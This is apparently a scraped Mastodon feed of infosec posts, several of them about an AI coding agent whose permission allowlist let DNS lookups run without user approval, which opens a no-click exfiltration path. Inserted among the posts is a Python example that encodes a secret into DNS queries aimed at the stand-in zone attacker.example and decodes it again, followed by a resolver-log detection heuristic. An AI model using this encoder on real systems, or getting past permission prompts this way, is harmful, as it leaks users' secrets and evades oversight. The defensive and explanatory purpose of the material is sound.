Brutkey

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

dying laughing here:

https://github.com/google-gemini/gemini-cli/issues/16750

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

For my friends out there on the job hunt.

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

New research out from @DomainTools@infosec.exchange Investigations today!

We took time to pull apart the "Charming Kitten" data dump and analyze it accordingly.

Always fascinating to me how different the threat actor groups can be both domestically and regionally. In APT35's case, much more militarily regimented, versus hybrid "state startup waterfall" or "criminal-state merge blend" setups.

#infosec #cybersecurity #threatintel

https://dti.domaintools.com/threat-intelligence-report-apt35-internal-leak-of-hacking-campaigns-against-lebanon-kuwait-turkey-saudi-arabia-korea-and-domestic-iranian-targets/

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

Audiobooks are a 100% valid way of reading, and if it's your primary way, I hear & honor ya.

Your irregular reminder that if you enjoy audiobooks Libro.fm is an incredibly good replacement for Audible.

Libro.fm provides DRM-free downloadable MP3 versions of the book (in addition to having an app you can use). They've had at least 90% of the books I've looked for.

They're also an employee-owned social corporation that allows you to support local independent bookstores with your purchases.

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

me trying to be less adversarial towards AI and then they specifically enable noclick DNS exfil

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

This is some really smart digging: realizing that Claude Code does not require user interaction for certain bash commands, they discovered that DNS lookups were specifically allowlisted, clearing a trivial path for well-known DNS exfiltration methods.

So when I say “all these implementations are ignoring years and decades of lessons learned the hard way” it’s not hyperbole. Anthropic 100% cleared the path for DNS exfil here.

h/t to
@cR0w@infosec.exchange - thank you!

#infosec #genai

https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
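The post above describes the mechanism only in outline: a DNS lookup that runs without a prompt is enough to carry data out, because the query name itself is the channel and the attacker's authoritative server sees it whether or not the name resolves. The block below is an added illustration written for this page, not code from the linked article, from Anthropic, or from Claude Code; it does not assert which commands were allowlisted. It assumes a hypothetical attacker zone `attacker.example`, a simple `<seq>.<base32 chunk>.<zone>` packing scheme, and constructed dnsmasq-style resolver log lines, and it pairs the exfil encoder/decoder with the kind of log-side heuristic a defender would run over those lines.

```python
"""DNS exfiltration via plain lookups, plus a resolver-log heuristic to spot it.
Added example for this page; the zone, packing scheme and log lines are constructed."""
import base64
import math
import re
from collections import Counter, defaultdict

MAX_LABEL = 63   # RFC 1035 per-label limit
MAX_NAME = 253   # practical whole-name limit
CHUNK = 60       # base32 characters carried per query name (one label, under 63)

# Constructed secret; nothing here is a real credential.
SECRET = b"AKIAEXAMPLEKEY0001:sk-constructed-token-value-never-a-real-secret-123456789"
EXFIL_ZONE = "attacker.example"   # hypothetical attacker-controlled zone


def encode_exfil_names(data: bytes, zone: str) -> list[str]:
    """Pack bytes into names of the form <seq>.<base32-chunk>.<zone>.

    One ordinary lookup per name (nslookup/dig/getent, anything that hits the
    resolver) delivers the chunk to the zone's authoritative server. The lookup
    does not need to succeed; the query is the payload."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names = []
    for seq, start in enumerate(range(0, len(b32), CHUNK)):
        name = f"{seq}.{b32[start:start + CHUNK]}.{zone}"
        # Stay inside what a resolver will forward at all.
        assert len(name) <= MAX_NAME
        assert all(len(label) <= MAX_LABEL for label in name.split("."))
        names.append(name)
    return names


def decode_exfil_names(names: list[str], zone: str) -> bytes:
    """Attacker side: order chunks by sequence number, restore base32 padding."""
    chunks = {}
    for name in names:
        seq, chunk, rest = name.split(".", 2)
        if rest != zone:
            continue
        chunks[int(seq)] = chunk
    b32 = "".join(chunks[i] for i in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)


# Constructed log lines in dnsmasq's "query[TYPE] name from client" shape.
LOG_RE = re.compile(r"query\[(?P<qtype>\w+)\] (?P<name>\S+) from (?P<src>\S+)")
BENIGN_NAMES = ["www.google.com", "mail.example.org", "cdn-assets-01.static.bigcompany.com"]
SAMPLE_LOG = [
    f"Jan 10 12:00:0{i} dnsmasq[123]: query[A] {n} from 10.0.0.5"
    for i, n in enumerate(BENIGN_NAMES + encode_exfil_names(SECRET, EXFIL_ZONE), start=1)
]


def shannon_entropy(s: str) -> float:
    """Bits per character; base32 payloads sit well above ordinary hostnames."""
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_queries(log_lines, max_label=30, min_entropy=3.2, max_unique_per_zone=10):
    """Flag query names whose subdomain part looks like encoded data (long, high
    entropy) or whose zone is seeing an unusual number of distinct names."""
    per_zone, parsed = defaultdict(set), []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        name = m["name"].rstrip(".").lower()
        labels = name.split(".")
        zone = ".".join(labels[-2:])       # crude registrable-domain guess
        per_zone[zone].add(name)
        parsed.append((name, labels[:-2], zone))
    flagged = set()
    for name, sub, zone in parsed:
        longest = max((len(label) for label in sub), default=0)
        if longest >= max_label and shannon_entropy("".join(sub)) >= min_entropy:
            flagged.add(name)
        elif len(per_zone[zone]) > max_unique_per_zone:
            flagged.add(name)
    return sorted(flagged)


if __name__ == "__main__":
    names = encode_exfil_names(SECRET, EXFIL_ZONE)
    print(f"{len(names)} queries carry {len(SECRET)} bytes")
    print("flagged:", suspicious_queries(SAMPLE_LOG))
```

Two caveats a defender should keep in mind: a short final chunk (or an attacker who deliberately keeps labels under the length threshold) slips past the per-query check, which is why the per-zone volume heuristic is there as well, and hash-like CDN or telemetry labels will trip the entropy rule, so a baseline of which zones normally see such names is needed before alerting on it. On the tool side, the fix is not a smarter allowlist entry but the thing the post is getting at: no network-touching command, DNS included, runs without the user seeing it.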

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

i mean who could've expected a yearslong, deeply researched, regularly used method of data exfiltration COULD BE ABUSED BY REMOVING NECESSARY USER INTERACTION

Ian Campbell 🏴🏴
@neurovagrant@masto.deoan.org

Hey! I know those guys!! Great conversation between two of the best leaders I've ever worked under. When you hear @danonsecurity@infosec.exchange talk about his love of and approach to community, you'll see why I'm ride-or-die.

And having been on 12-24hr bridge calls with both him and
@bapril@infosec.exchange when the crap hit the fan, as well as having come to them both to take responsibility for mistakes or errors in judgment, I can vouch that they both walk the walk covered here.

#infosec

https://youtu.be/yuryI513s2M
